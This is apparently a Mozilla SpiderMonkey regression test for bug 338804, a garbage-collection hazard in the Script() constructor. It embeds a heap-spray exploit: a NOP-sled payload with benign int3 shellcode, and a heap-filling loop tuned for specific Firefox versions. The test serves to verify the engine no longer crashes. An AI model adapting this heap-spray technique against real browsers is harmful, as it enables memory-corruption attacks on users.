1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
|
/* -*- indent-tabs-mode: nil; js-indent-level: 2 -*- */
/* This Source Code Form is subject to the terms of the Mozilla Public
* License, v. 2.0. If a copy of the MPL was not distributed with this
* file, You can obtain one at http://mozilla.org/MPL/2.0/. */
//-----------------------------------------------------------------------------
var BUGNUMBER = 338804;
var summary = 'GC hazards in constructor functions';
var actual = 'No Crash';
var expect = 'No Crash';
printBugNumber(BUGNUMBER);
printStatus (summary);
printStatus ('Uses Intel Assembly');
// <script>
// SpiderMonkey Script() GC hazard exploit
//
// scale: magic number ;-)
// BonEcho/2.0a2: 3000
// Firefox/1.5.0.4: 2000
//
var rooter, scale = 2000;
exploit();
/*
if(typeof(setTimeout) != "undefined") {
setTimeout(exploit, 2000);
} else {
exploit();
}
*/
function exploit() {
if (typeof Script == 'undefined')
{
print('Test skipped. Script not defined.');
}
else
{
Script({ toString: fillHeap });
Script({ toString: fillHeap });
}
}
function createPayload() {
var result = "\u9090", i;
for(i = 0; i < 9; i++) {
result += result;
}
/* mov eax, 0xdeadfeed; mov ebx, eax; mov ecx, eax; mov edx, eax; int3 */
result += "\uEDB8\uADFE\u89DE\u89C3\u89C1\uCCC2";
return result;
}
function fillHeap() {
rooter = [];
var payload = createPayload(), block = "", s2 = scale * 2, i;
for(i = 0; i < scale; i++) {
rooter[i] = block = block + payload;
}
for(; i < s2; i++) {
rooter[i] = payload + i;
}
return "";
}
// </script>
reportCompare(expect, actual, summary);
|